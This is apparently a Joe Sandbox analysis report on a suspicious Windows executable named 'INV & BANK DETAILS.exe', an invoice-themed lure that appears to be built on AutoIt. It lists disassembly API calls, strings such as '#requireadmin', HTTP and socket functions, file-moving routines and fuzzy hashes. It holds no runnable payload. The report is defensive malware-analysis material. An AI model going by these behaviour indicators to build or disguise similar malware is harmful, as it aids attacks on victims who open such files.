                                • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                APIs
                                • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                • VariantClear.OLEAUT32 ref: 0045EA6D
                                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                • __swprintf.LIBCMT ref: 0045EC33
                                • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                Strings
                                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                • String ID: %4d%02d%02d%02d%02d%02d
                                • API String ID: 2441338619-1568723262
                                • Opcode ID: ba21fae3964782e52667caf67f57b1ece5b73a8e74dd4204ce642d4b919161a9
                                • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                • Opcode Fuzzy Hash: ba21fae3964782e52667caf67f57b1ece5b73a8e74dd4204ce642d4b919161a9
                                • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                APIs
                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Interlocked$DecrementIncrement$Sleep
                                • String ID: @COM_EVENTOBJ
                                • API String ID: 327565842-2228938565
                                • Opcode ID: 8d68769e25e8d01640c36805b8621208eaf5358c57efe8be0f1ba0a08893845a
                                • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                • Opcode Fuzzy Hash: 8d68769e25e8d01640c36805b8621208eaf5358c57efe8be0f1ba0a08893845a
                                • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                APIs
                                • VariantClear.OLEAUT32(?), ref: 0047031B
                                • VariantClear.OLEAUT32(?), ref: 0047044F
                                • VariantInit.OLEAUT32(?), ref: 004704A3
                                • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                • VariantClear.OLEAUT32(?), ref: 00470516
                                  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Variant$Clear$Copy$CallDispFuncInit
                                • String ID: H
                                • API String ID: 3613100350-2852464175
                                • Opcode ID: 3653b9c9f3c385f97f89112f5105d29a1c420b11bc29a6964f6d9efc47683255
                                • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                • Opcode Fuzzy Hash: 3653b9c9f3c385f97f89112f5105d29a1c420b11bc29a6964f6d9efc47683255
                                • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                APIs
                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                • String ID:
                                • API String ID: 1291720006-3916222277
                                • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                APIs
                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                • IsMenu.USER32(?), ref: 0045FC5F
                                • CreatePopupMenu.USER32 ref: 0045FC97
                                • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                • String ID: 0$2
                                • API String ID: 93392585-3793063076
                                • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                APIs
                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                • VariantClear.OLEAUT32(?), ref: 00435320
                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                • VariantClear.OLEAUT32(?), ref: 004353B3
                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                • String ID: crts
                                • API String ID: 586820018-3724388283
                                • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                APIs
                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\INV & BANK DETAILS.exe,0040F545,C:\Users\user\Desktop\INV & BANK DETAILS.exe,004A90E8,C:\Users\user\Desktop\INV & BANK DETAILS.exe,?,0040F545), ref: 0041013C
                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                • _wcscat.LIBCMT ref: 0044BCAF
                                • _wcslen.LIBCMT ref: 0044BCBB
                                • _wcslen.LIBCMT ref: 0044BCD1
                                • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                • String ID: \*.*
                                • API String ID: 2326526234-1173974218
                                • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                APIs
                                  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                • _wcslen.LIBCMT ref: 004335F2
                                • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                • GetLastError.KERNEL32 ref: 0043362B
                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                • _wcsrchr.LIBCMT ref: 00433666
                                  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                • String ID: \
                                • API String ID: 321622961-2967466578
                                • Opcode ID: 4d62cddd39e6499c0bf6f3e67d5a9631e2ea97a5f8ad0550c3b0128d52bea9a3
                                • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                • Opcode Fuzzy Hash: 4d62cddd39e6499c0bf6f3e67d5a9631e2ea97a5f8ad0550c3b0128d52bea9a3
                                • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __wcsnicmp
                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                • API String ID: 1038674560-2734436370
                                • Opcode ID: 769a1168dbf3b056e6a3c570e5d7bf636aa566bb12a42c52eeb89d6cb06eb2f1
                                • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                • Opcode Fuzzy Hash: 769a1168dbf3b056e6a3c570e5d7bf636aa566bb12a42c52eeb89d6cb06eb2f1
                                • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                APIs
                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                • __lock.LIBCMT ref: 00417981
                                  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                • __lock.LIBCMT ref: 004179A2
                                • ___addlocaleref.LIBCMT ref: 004179C0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                • String ID: KERNEL32.DLL$pI
                                • API String ID: 637971194-197072765
                                • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove$_malloc
                                • String ID:
                                • API String ID: 1938898002-0
                                • Opcode ID: e7d2170c55f7dc781d7a380fa012853440c6ce733db375b884678bad7424ae85
                                • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                • Opcode Fuzzy Hash: e7d2170c55f7dc781d7a380fa012853440c6ce733db375b884678bad7424ae85
                                • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                APIs
                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                • _memmove.LIBCMT ref: 0044B555
                                • _memmove.LIBCMT ref: 0044B578
                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                • String ID:
                                • API String ID: 2737351978-0
                                • Opcode ID: 15c89243ef38b9e681754c30b7b739330f64afb75777a21f57b4f83e6b8eed0a
                                • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                • Opcode Fuzzy Hash: 15c89243ef38b9e681754c30b7b739330f64afb75777a21f57b4f83e6b8eed0a
                                • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                APIs
                                • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                • __calloc_crt.LIBCMT ref: 00415246
                                • __getptd.LIBCMT ref: 00415253
                                • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                • _free.LIBCMT ref: 0041529E
                                • __dosmaperr.LIBCMT ref: 004152A9
                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                • String ID:
                                • API String ID: 3638380555-0
                                • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 0046C96E
                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Variant$Copy$ClearErrorInitLast
                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                • API String ID: 3207048006-625585964
                                • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                APIs
                                • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                • gethostbyname.WSOCK32(?), ref: 004655A6
